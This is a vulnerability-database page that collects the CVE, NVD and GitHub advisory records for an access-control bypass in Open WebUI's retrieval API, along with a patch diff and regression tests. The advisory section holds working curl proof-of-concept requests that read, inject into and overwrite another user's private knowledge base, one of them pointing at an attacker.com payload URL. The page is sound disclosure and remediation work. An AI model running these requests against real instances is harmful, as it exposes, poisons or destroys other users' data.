CVE-2026-45398 (GCVE-0-2026-45398)

Vulnerability from cvelistv5 – Published: 2026-05-15 20:35 – Updated: 2026-05-19 03:55

Title

Open WebUI: IDOR - Retrieval API Bypasses Knowledge Base Access Controls

Summary

Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.9.5, _validate_collection_access() checks the user-memory-* and file-* collection name prefixes but does not check knowledge base collections, which use raw UUIDs as collection names. Any authenticated user who knows a private knowledge base UUID can read its content through the retrieval query endpoints, even though the knowledge API correctly denies that user access. The same gap affects the retrieval write endpoints (/process/text, /process/file, /process/files/batch, /process/web, /process/youtube), allowing an attacker to inject content into or overwrite another user's knowledge base. This vulnerability is fixed in 0.9.5.

Severity

7.5 (High)


                        
                          CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H

CWE

CWE-639 - Authorization Bypass Through User-Controlled Key

Assigner

GitHub_M

References

3 references

URL	Tags
https://github.com/open-webui/open-webui/security…	x_refsource_CONFIRM
https://github.com/open-webui/open-webui/pull/22109	x_refsource_MISC
https://github.com/open-webui/open-webui/releases…	x_refsource_MISC

Impacted products

1 product

Vendor	Product	Version
open-webui	open-webui	Affected: < 0.9.5

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2026-45398",
                "options": [
                  {
                    "Exploitation": "poc"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "total"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2026-05-18T00:00:00+00:00",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2026-05-19T03:55:35.975Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "references": [
          {
            "tags": [
              "exploit"
            ],
            "url": "https://github.com/open-webui/open-webui/security/advisories/GHSA-4g37-7p2c-38r9"
          }
        ],
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "open-webui",
          "vendor": "open-webui",
          "versions": [
            {
              "status": "affected",
              "version": "\u003c 0.9.5"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.9.5, _validate_collection_access() checks the user-memory-* and file-* collection name prefixes but does not check knowledge base collections, which use raw UUIDs as collection names. Any authenticated user who knows a private knowledge base UUID can read its content through the retrieval query endpoints, even though the knowledge API correctly denies that user access. The same gap affects the retrieval write endpoints (/process/text, /process/file, /process/files/batch, /process/web, /process/youtube), allowing an attacker to inject content into or overwrite another user\u0027s knowledge base. This vulnerability is fixed in 0.9.5."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "HIGH",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-639",
              "description": "CWE-639: Authorization Bypass Through User-Controlled Key",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-05-15T20:35:35.482Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/open-webui/open-webui/security/advisories/GHSA-4g37-7p2c-38r9",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/open-webui/open-webui/security/advisories/GHSA-4g37-7p2c-38r9"
        },
        {
          "name": "https://github.com/open-webui/open-webui/pull/22109",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/open-webui/open-webui/pull/22109"
        },
        {
          "name": "https://github.com/open-webui/open-webui/releases/tag/v0.9.5",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/open-webui/open-webui/releases/tag/v0.9.5"
        }
      ],
      "source": {
        "advisory": "GHSA-4g37-7p2c-38r9",
        "discovery": "UNKNOWN"
      },
      "title": "Open WebUI: IDOR - Retrieval API Bypasses Knowledge Base Access Controls"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2026-45398",
    "datePublished": "2026-05-15T20:35:35.482Z",
    "dateReserved": "2026-05-12T01:48:40.451Z",
    "dateUpdated": "2026-05-19T03:55:35.975Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2",
  "vulnerability-lookup:meta": {
    "epss": {
      "cve": "CVE-2026-45398",
      "date": "2026-05-28",
      "epss": "0.00043",
      "percentile": "0.13399"
    },
    "nvd": "{\"cve\":{\"id\":\"CVE-2026-45398\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2026-05-15T21:16:37.863\",\"lastModified\":\"2026-05-19T12:18:19.193\",\"vulnStatus\":\"Analyzed\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.9.5, _validate_collection_access() checks the user-memory-* and file-* collection name prefixes but does not check knowledge base collections, which use raw UUIDs as collection names. Any authenticated user who knows a private knowledge base UUID can read its content through the retrieval query endpoints, even though the knowledge API correctly denies that user access. The same gap affects the retrieval write endpoints (/process/text, /process/file, /process/files/batch, /process/web, /process/youtube), allowing an attacker to inject content into or overwrite another user\u0027s knowledge base. This vulnerability is fixed in 0.9.5.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H\",\"baseScore\":7.5,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"HIGH\",\"privilegesRequired\":\"LOW\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":1.6,\"impactScore\":5.9}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-639\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:openwebui:open_webui:*:*:*:*:*:*:*:*\",\"versionEndExcluding\":\"0.9.5\",\"matchCriteriaId\":\"19F64B41-71DA-4E31-A040-1C351A537567\"}]}]}],\"references\":[{\"url\":\"https://github.com/open-webui/open-webui/pull/22109\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Issue Tracking\",\"Patch\"]},{\"url\":\"https://github.com/open-webui/open-webui/releases/tag/v0.9.5\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Release Notes\"]},{\"url\":\"https://github.com/open-webui/open-webui/security/advisories/GHSA-4g37-7p2c-38r9\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Exploit\",\"Mitigation\",\"Vendor Advisory\"]},{\"url\":\"https://github.com/open-webui/open-webui/security/advisories/GHSA-4g37-7p2c-38r9\",\"source\":\"134c704f-9b21-4f2e-91b3-4a467353bcc0\",\"tags\":[\"Exploit\",\"Mitigation\",\"Vendor Advisory\"]}]}}",
    "vulnrichment": {
      "containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2026-45398\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"no\"}, {\"Technical Impact\": \"total\"}], \"version\": \"2.0.3\", \"timestamp\": \"2026-05-18T16:01:45.264814Z\"}}}], \"references\": [{\"url\": \"https://github.com/open-webui/open-webui/security/advisories/GHSA-4g37-7p2c-38r9\", \"tags\": [\"exploit\"]}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2026-05-18T16:01:27.587Z\"}}], \"cna\": {\"title\": \"Open WebUI: IDOR - Retrieval API Bypasses Knowledge Base Access Controls\", \"source\": {\"advisory\": \"GHSA-4g37-7p2c-38r9\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV3_1\": {\"scope\": \"UNCHANGED\", \"version\": \"3.1\", \"baseScore\": 7.5, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"HIGH\", \"vectorString\": \"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H\", \"integrityImpact\": \"HIGH\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"HIGH\", \"availabilityImpact\": \"HIGH\", \"privilegesRequired\": \"LOW\", \"confidentialityImpact\": \"HIGH\"}}], \"affected\": [{\"vendor\": \"open-webui\", \"product\": \"open-webui\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003c 0.9.5\"}]}], \"references\": [{\"url\": \"https://github.com/open-webui/open-webui/security/advisories/GHSA-4g37-7p2c-38r9\", \"name\": \"https://github.com/open-webui/open-webui/security/advisories/GHSA-4g37-7p2c-38r9\", \"tags\": [\"x_refsource_CONFIRM\"]}, {\"url\": \"https://github.com/open-webui/open-webui/pull/22109\", \"name\": \"https://github.com/open-webui/open-webui/pull/22109\", \"tags\": [\"x_refsource_MISC\"]}, {\"url\": \"https://github.com/open-webui/open-webui/releases/tag/v0.9.5\", \"name\": \"https://github.com/open-webui/open-webui/releases/tag/v0.9.5\", \"tags\": [\"x_refsource_MISC\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.9.5, _validate_collection_access() checks the user-memory-* and file-* collection name prefixes but does not check knowledge base collections, which use raw UUIDs as collection names. Any authenticated user who knows a private knowledge base UUID can read its content through the retrieval query endpoints, even though the knowledge API correctly denies that user access. The same gap affects the retrieval write endpoints (/process/text, /process/file, /process/files/batch, /process/web, /process/youtube), allowing an attacker to inject content into or overwrite another user\u0027s knowledge base. This vulnerability is fixed in 0.9.5.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-639\", \"description\": \"CWE-639: Authorization Bypass Through User-Controlled Key\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2026-05-15T20:35:35.482Z\"}}}",
      "cveMetadata": "{\"cveId\": \"CVE-2026-45398\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2026-05-19T03:55:35.975Z\", \"dateReserved\": \"2026-05-12T01:48:40.451Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2026-05-15T20:35:35.482Z\", \"assignerShortName\": \"GitHub_M\"}",
      "dataType": "CVE_RECORD",
      "dataVersion": "5.2"
    }
  }
}

FKIE_CVE-2026-45398

Vulnerability from fkie_nvd - Published: 2026-05-15 21:16 - Updated: 2026-05-19 12:18

Severity

7.5 (High) - CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H

Summary

References

URL	Tags
security-advisories@github.com	https://github.com/open-webui/open-webui/pull/22109	Issue Tracking, Patch
security-advisories@github.com	https://github.com/open-webui/open-webui/releases/tag/v0.9.5	Release Notes
security-advisories@github.com	https://github.com/open-webui/open-webui/security/advisories/GHSA-4g37-7p2c-38r9	Exploit, Mitigation, Vendor Advisory
134c704f-9b21-4f2e-91b3-4a467353bcc0	https://github.com/open-webui/open-webui/security/advisories/GHSA-4g37-7p2c-38r9	Exploit, Mitigation, Vendor Advisory

Impacted products

	Vendor	Product	Version
	openwebui	open_webui	*

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:openwebui:open_webui:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "19F64B41-71DA-4E31-A040-1C351A537567",
              "versionEndExcluding": "0.9.5",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.9.5, _validate_collection_access() checks the user-memory-* and file-* collection name prefixes but does not check knowledge base collections, which use raw UUIDs as collection names. Any authenticated user who knows a private knowledge base UUID can read its content through the retrieval query endpoints, even though the knowledge API correctly denies that user access. The same gap affects the retrieval write endpoints (/process/text, /process/file, /process/files/batch, /process/web, /process/youtube), allowing an attacker to inject content into or overwrite another user\u0027s knowledge base. This vulnerability is fixed in 0.9.5."
    }
  ],
  "id": "CVE-2026-45398",
  "lastModified": "2026-05-19T12:18:19.193",
  "metrics": {
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "HIGH",
          "attackVector": "NETWORK",
          "availabilityImpact": "HIGH",
          "baseScore": 7.5,
          "baseSeverity": "HIGH",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "HIGH",
          "privilegesRequired": "LOW",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
          "version": "3.1"
        },
        "exploitabilityScore": 1.6,
        "impactScore": 5.9,
        "source": "security-advisories@github.com",
        "type": "Secondary"
      }
    ]
  },
  "published": "2026-05-15T21:16:37.863",
  "references": [
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Issue Tracking",
        "Patch"
      ],
      "url": "https://github.com/open-webui/open-webui/pull/22109"
    },
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Release Notes"
      ],
      "url": "https://github.com/open-webui/open-webui/releases/tag/v0.9.5"
    },
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Exploit",
        "Mitigation",
        "Vendor Advisory"
      ],
      "url": "https://github.com/open-webui/open-webui/security/advisories/GHSA-4g37-7p2c-38r9"
    },
    {
      "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
      "tags": [
        "Exploit",
        "Mitigation",
        "Vendor Advisory"
      ],
      "url": "https://github.com/open-webui/open-webui/security/advisories/GHSA-4g37-7p2c-38r9"
    }
  ],
  "sourceIdentifier": "security-advisories@github.com",
  "vulnStatus": "Analyzed",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-639"
        }
      ],
      "source": "security-advisories@github.com",
      "type": "Secondary"
    }
  ]
}

GHSA-4G37-7P2C-38R9

Vulnerability from github – Published: 2026-05-14 20:26 – Updated: 2026-05-15 23:55

Summary

Open WebUI Vulnerable to IDOR: Retrieval API Bypasses Knowledge Base Access Controls

Details

IDOR: Retrieval API Bypasses Knowledge Base Access Controls

Author: Andrew Orr aorr@tenable.com

Summary

_validate_collection_access() (PR #22109) checks the user-memory-* and file-* collection name prefixes but does not check knowledge base collections, which use raw UUIDs as collection names. Any authenticated user who knows a private knowledge base UUID can read its content through the retrieval query endpoints, even though the knowledge API correctly denies that user access. The same gap affects the retrieval write endpoints (/process/text, /process/file, /process/files/batch, /process/web, /process/youtube), allowing an attacker to inject content into or overwrite another user's knowledge base.

Reproduced on main at commit 4d058a125 (v0.8.11) on March 26, 2026.

Severity

CWE-639: Authorization Bypass Through User-Controlled Key
CVSS 3.1: 7.5 (AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H) -- AC:H because exploitation requires knowing a target UUID; I:H and A:H because the write path allows poisoning or destruction of another user's knowledge base

Default Configuration Reachability

Reachable in default configuration. All affected endpoints require only get_verified_user, not get_admin_user, so any non-admin account in a typical multi-user deployment can reach them. The only prerequisite beyond authentication is knowledge of a target knowledge base UUID, which is reflected in the AC:H score. However, KB UUIDs are stable identifiers that leak through normal usage rather than secrets (see Prerequisites below).

Root Cause

Knowledge base embeddings are stored in vector DB collections named with the knowledge base's UUID (e.g., 550e8400-e29b-41d4-a716-446655440000). The _validate_collection_access function only blocks two specific prefixes:

# backend/open_webui/routers/retrieval.py lines 2330-2355
def _validate_collection_access(collection_names: list[str], user) -> None:
    if user.role == "admin":
        return

    for name in collection_names:
        if name.startswith("user-memory-") and name != f"user-memory-{user.id}":
            raise HTTPException(
                status_code=status.HTTP_403_FORBIDDEN,
                detail=ERROR_MESSAGES.ACCESS_PROHIBITED,
            )
        elif name.startswith("file-"):
            file_id = name[len("file-"):]
            if not has_access_to_file(
                file_id=file_id,
                access_type="read",
                user=user,
            ):
                raise HTTPException(
                    status_code=status.HTTP_403_FORBIDDEN,
                    detail=ERROR_MESSAGES.ACCESS_PROHIBITED,
                )
        # No else clause -- knowledge base UUIDs pass through unchecked

Knowledge base UUIDs do not match either prefix, so the function returns without raising an exception. The query then executes against the vector DB with no further authorization check.

Vulnerable Endpoints

Read Endpoints

Both retrieval query endpoints accept a collection name and call _validate_collection_access as their sole authorization gate:

POST /api/v1/retrieval/query/doc (line 2367) -- single collection_name
POST /api/v1/retrieval/query/collection (line 2432) -- list of collection_names

Write Endpoints

The following endpoints accept a collection_name parameter and write to the target collection without checking whether the caller owns it:

POST /api/v1/retrieval/process/text (line 1777) -- appends attacker-controlled content to the target collection
POST /api/v1/retrieval/process/file (line 1528) -- validates ownership of the uploaded file but not the destination collection
POST /api/v1/retrieval/process/files/batch (line 2578) -- same as above for multiple files
POST /api/v1/retrieval/process/web and POST /api/v1/retrieval/process/youtube (lines 1810-1811) -- same handler; overwrite defaults to true, so targeting an existing knowledge base deletes and replaces it

Endpoint	Read	Write	Overwrite	Access Check
/query/doc	Yes	--	--	Prefix-only (bypassed)
/query/collection	Yes	--	--	Prefix-only (bypassed)
/process/text	--	Yes	--	None
/process/web	--	Yes	Yes (default)	None
/process/youtube	--	Yes	Yes (default)	None (same handler as /process/web)
/process/file	--	Yes	--	File only, not collection
/process/files/batch	--	Yes	--	File only, not collection

Proof of Concept

Security boundary crossed: The knowledge base access control system (ownership checks, group-based access grants) is bypassed at the retrieval layer. A non-admin user who knows a private knowledge base UUID can read it, append attacker-controlled content to it, or destroy and replace it through the retrieval API, even though the knowledge API correctly denies the same user access to the same resource.

open-webui-idor-poc.sh provides a self-contained Docker lab that stands up the target environment and tests every vulnerable endpoint listed above. See the comments at the top of that file for setup, usage, and configuration options.

Prerequisites

Attacker has an authenticated (non-pending) account on the target instance.
A victim user has created a private knowledge base containing sensitive documents.
Attacker knows the victim's knowledge base UUID. V4 UUIDs are not guessable, but they are stable identifiers that leak through normal platform usage:
Access revocation: A user learns a KB UUID through a shared workspace or group, loses access, and finds the retrieval API still honors the stale UUID. The knowledge API correctly revokes access at request time (access_grants.py:549-558 dynamically queries current group memberships), but the retrieval API has no equivalent check.
Model metadata: When a model is shared with a group, GET /api/models/list returns the full meta.knowledge array -- including KB UUIDs -- to every user with access to the model, even if they have no access to the referenced knowledge bases (models.py:58-130).
URL leakage: KB UUIDs appear in browser URLs (/workspace/knowledge/{id}, Knowledge.svelte:260) and can leak through shared links, browser history, Referrer headers, or proxy logs.
RAG citation metadata: KB UUIDs are stored as source.id in chat message sources (middleware.py:1950-1965, socket/main.py:880-897). Shared chats return these sources unfiltered (chats.py:815-830).

Read: Extract Private KB Content

Authenticate as the attacker:

TOKEN=$(curl -s -X POST https://open-webui/api/v1/auths/signin \
  -H "Content-Type: application/json" \
  -d '{"email": "attacker@example.com", "password": "password"}' \
  | jq -r '.token')

Control request: the knowledge API correctly blocks the attacker:

curl -s https://open-webui/api/v1/knowledge/<victim_kb_uuid> \
  -H "Authorization: Bearer $TOKEN"

{"detail": "You do not have permission to access this resource."}

Exploit request: the retrieval API returns the same KB's content without authorization:

curl -s -X POST https://open-webui/api/v1/retrieval/query/doc \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" \
  -d '{
    "collection_name": "<victim_kb_uuid>",
    "query": "confidential",
    "k": 50
  }'

Expected result when vulnerable: the server returns matching document chunks from the victim's private knowledge base, including text content and metadata (source filenames, file IDs, hashes).

The /query/collection endpoint accepts a list of collection names and behaves identically:

curl -s -X POST https://open-webui/api/v1/retrieval/query/collection \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" \
  -d '{
    "collection_names": ["<victim_kb_uuid>"],
    "query": "confidential",
    "k": 50
  }'

Write: File Injection via /process/file

The /process/file endpoint validates that the attacker owns the uploaded file but does not validate the target collection_name. The attacker uploads a file under their own account, then processes it into the victim's collection:

# Upload attacker's file
FILE_ID=$(curl -s -X POST https://open-webui/api/v1/files/ \
  -H "Authorization: Bearer $TOKEN" \
  -F "file=@payload.txt;type=text/plain" \
  | jq -r '.id')

# Process it into the victim's KB collection
curl -s -X POST https://open-webui/api/v1/retrieval/process/file \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" \
  -d "{
    \"file_id\": \"$FILE_ID\",
    \"collection_name\": \"<victim_kb_uuid>\"
  }"

Write: Batch File Injection via /process/files/batch

Same pattern as above but accepts multiple files in a single request:

# Get the full file object for the attacker's uploaded file
FILE_OBJ=$(curl -s https://open-webui/api/v1/files/$FILE_ID \
  -H "Authorization: Bearer $TOKEN")

# Batch-process into the victim's KB collection
curl -s -X POST https://open-webui/api/v1/retrieval/process/files/batch \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" \
  -d "{
    \"files\": [$FILE_OBJ],
    \"collection_name\": \"<victim_kb_uuid>\"
  }"

Write: Text Injection via /process/text

/process/text appends attacker-controlled content to an existing knowledge base collection:

curl -s -X POST https://open-webui/api/v1/retrieval/process/text \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" \
  -d '{
    "name": "injected.txt",
    "content": "INJECTED BY ATTACKER: attacker-controlled content",
    "collection_name": "<victim_kb_uuid>"
  }'

The PoC then verifies that the injected text is returned by a follow-up query against the victim collection.

Write: YouTube Transcript Replacement via /process/youtube

/process/youtube uses the same handler as /process/web with the same overwrite=true default. This request replaces the victim's collection with the fetched transcript:

curl -s -X POST https://open-webui/api/v1/retrieval/process/youtube \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" \
  -d '{
    "url": "https://www.youtube.com/watch?v=dQw4w9WgXcQ",
    "collection_name": "<victim_kb_uuid>"
  }'

Write: Data Destruction via /process/web

/process/web defaults to overwrite=true, which deletes the existing collection before writing. The explicit query string below makes the destructive behavior obvious:

curl -s -X POST "https://open-webui/api/v1/retrieval/process/web?overwrite=true" \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" \
  -d '{
    "url": "https://attacker.com/payload.html",
    "collection_name": "<victim_kb_uuid>"
  }'

Impact

Confidentiality: Any authenticated user can read private knowledge base contents belonging to other users on the instance.
Integrity: Attacker-controlled content can be injected into another user's knowledge base, poisoning downstream RAG results. Injected prompt-injection payloads would be passed to the model when the victim queries the knowledge base.
Availability: /process/web and /process/youtube default to overwrite=true, letting an attacker delete and replace a victim's entire knowledge base in a single request.

Remediation

Two changes are needed:

Add a permission parameter to _validate_collection_access, use it for both file-* and knowledge base checks, and add a knowledge base ownership/access check for collection names that do not match the existing prefixes. AccessGrants.has_access already resolves group memberships internally when user_group_ids is omitted, matching the pattern used throughout knowledge.py.
The affected write endpoints must call _validate_collection_access with permission="write" before operating on the provided collection_name.

--- a/backend/open_webui/routers/retrieval.py
+++ b/backend/open_webui/routers/retrieval.py
@@ -39,4 +39,5 @@
 from open_webui.models.files import FileModel, FileUpdateForm, Files
 from open_webui.utils.access_control.files import has_access_to_file
 from open_webui.models.knowledge import Knowledges
+from open_webui.models.access_grants import AccessGrants
 from open_webui.storage.provider import Storage

@@ -2330,26 +2331,39 @@
-def _validate_collection_access(collection_names: list[str], user) -> None:
+def _validate_collection_access(collection_names: list[str], user, permission: str = "read") -> None:
     if user.role == "admin":
         return

     for name in collection_names:
         if name.startswith("user-memory-") and name != f"user-memory-{user.id}":
             raise HTTPException(
                 status_code=status.HTTP_403_FORBIDDEN,
                 detail=ERROR_MESSAGES.ACCESS_PROHIBITED,
             )
         elif name.startswith("file-"):
             file_id = name[len("file-"):]
-            if not has_access_to_file(
-                file_id=file_id,
-                access_type="read",
-                user=user,
-            ):
+            if not has_access_to_file(
+                file_id=file_id,
+                access_type=permission,
+                user=user,
+            ):
                 raise HTTPException(
                     status_code=status.HTTP_403_FORBIDDEN,
                     detail=ERROR_MESSAGES.ACCESS_PROHIBITED,
                 )
+        else:
+            knowledge = Knowledges.get_knowledge_by_id(id=name)
+            if knowledge and knowledge.user_id != user.id:
+                if not AccessGrants.has_access(
+                    user_id=user.id,
+                    resource_type="knowledge",
+                    resource_id=name,
+                    permission=permission,
+                ):
+                    raise HTTPException(
+                        status_code=status.HTTP_403_FORBIDDEN,
+                        detail=ERROR_MESSAGES.ACCESS_PROHIBITED,
+                    )

The existing read callers (/query/doc, /query/collection) use the default permission="read" and require no change. Each affected write endpoint needs a validation call after collection_name is resolved:

/process/text (line 1777):

@@ -1783,5 +1783,6 @@
     collection_name = form_data.collection_name
     if collection_name is None:
         collection_name = calculate_sha256_string(form_data.content)
+    _validate_collection_access([collection_name], user, permission="write")

     docs = [

/process/web and /process/youtube (lines 1810-1811, same handler):

@@ -1824,5 +1824,6 @@
             collection_name = form_data.collection_name
             if not collection_name:
                 collection_name = calculate_sha256_string(form_data.url)[:63]
+            _validate_collection_access([collection_name], user, permission="write")

             if not request.app.state.config.BYPASS_WEB_SEARCH_EMBEDDING_AND_RETRIEVAL:

/process/file (line 1528):

@@ -1548,6 +1548,7 @@
             collection_name = form_data.collection_name
             if collection_name is None:
                 collection_name = f"file-{file.id}"
+            _validate_collection_access([collection_name], user, permission="write")

             if form_data.content:

/process/files/batch (line 2578):

@@ -2593,3 +2593,4 @@
     collection_name = form_data.collection_name
+    _validate_collection_access([collection_name], user, permission="write")

     file_results: List[BatchProcessFilesResult] = []

Regression Test

A regression test should verify that _validate_collection_access blocks non-owners from accessing knowledge base collections:

from unittest.mock import MagicMock, patch

import pytest
from fastapi import HTTPException

from open_webui.routers.retrieval import _validate_collection_access


def test_validate_collection_access_blocks_non_owner_read():
    victim_kb_id = "550e8400-e29b-41d4-a716-446655440000"
    attacker = MagicMock()
    attacker.id = "attacker-user-id"
    attacker.role = "user"

    mock_knowledge = MagicMock()
    mock_knowledge.user_id = "victim-user-id"

    with patch(
        "open_webui.routers.retrieval.Knowledges.get_knowledge_by_id",
        return_value=mock_knowledge,
    ), patch(
        "open_webui.routers.retrieval.AccessGrants.has_access",
        return_value=False,
    ):
        with pytest.raises(HTTPException) as exc_info:
            _validate_collection_access([victim_kb_id], attacker)
        assert exc_info.value.status_code == 403


def test_validate_collection_access_blocks_non_owner_write():
    victim_kb_id = "550e8400-e29b-41d4-a716-446655440000"
    attacker = MagicMock()
    attacker.id = "attacker-user-id"
    attacker.role = "user"

    mock_knowledge = MagicMock()
    mock_knowledge.user_id = "victim-user-id"

    with patch(
        "open_webui.routers.retrieval.Knowledges.get_knowledge_by_id",
        return_value=mock_knowledge,
    ), patch(
        "open_webui.routers.retrieval.AccessGrants.has_access",
        return_value=False,
    ):
        with pytest.raises(HTTPException) as exc_info:
            _validate_collection_access(
                [victim_kb_id], attacker, permission="write"
            )
        assert exc_info.value.status_code == 403

For additional coverage, maintainers may want an integration test that creates a knowledge base as one user and confirms that a second user's retrieval query is rejected end-to-end.

AI Disclosure

AI assistance was used to help analyze the code paths, develop the PoC workflow, and draft this report.

Attachments

open-webui-idor-poc.log open-webui-idor-poc.sh

Tenable's Disclosure Policy

Tenable follows a 90-day vulnerability disclosure policy. That means, even though we prefer coordinated disclosure, we'll issue an advisory on June 24, 2026 with or without a patch. Alternatively, any uncoordinated vendor release of a patch or advisory to any customers before the 90-day deadline will be considered public disclosure, and Tenable may release an advisory prior to the coordinated disclosure date. Please read the full details of our policy here: https://static.tenable.com/research/tenable-vulnerability-disclosure-policy.pdf

Thank you for taking the time to read this. We'd greatly appreciate it if you'd acknowledge receipt of this report. If you have any questions we'd be happy to address them.

Severity

7.5 (High)


                  
                    CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 0.9.4"
      },
      "package": {
        "ecosystem": "PyPI",
        "name": "open-webui"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.9.5"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-45398"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-639"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-05-14T20:26:42Z",
    "nvd_published_at": "2026-05-15T21:16:37Z",
    "severity": "HIGH"
  },
